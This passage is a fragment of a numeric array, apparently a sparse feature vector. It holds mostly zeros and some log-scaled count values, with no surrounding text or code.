0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.581130849408909, 0.0, 0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.302585092994046, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.2958368660043296, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.292158018817389, \n 3.9318256327243257, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.143134726391533, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5553480614894135, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.204692619390966, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.044522437723423,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 3.178053830347946, 0, 0.0, 0.0, 0.0, \n 5.375278407684165, 0.0, 0.0, 0.0, 0.0, 0, 2.4849066497880004, 0.0, 0.0,\n 4.110873864173311, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 5.723585101952381, 0.0, 0.0, 1.0986122886681098, 0.0, \n 3.58351893845611, 0.0, 0.0, 0, 0.0, 2.0794415416798357, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 4.969813299576001, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 5.278114659230517, 0, 0.0, \n 2.1972245773362196, 0.0, 0, 0.0, 9.825309771472105, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 5.723585101952381, 0.0, 1.7412592803704001, 0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 3.4825185607408002, 0, 0, 0, 0.0, 0, 3.0841946160253877, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 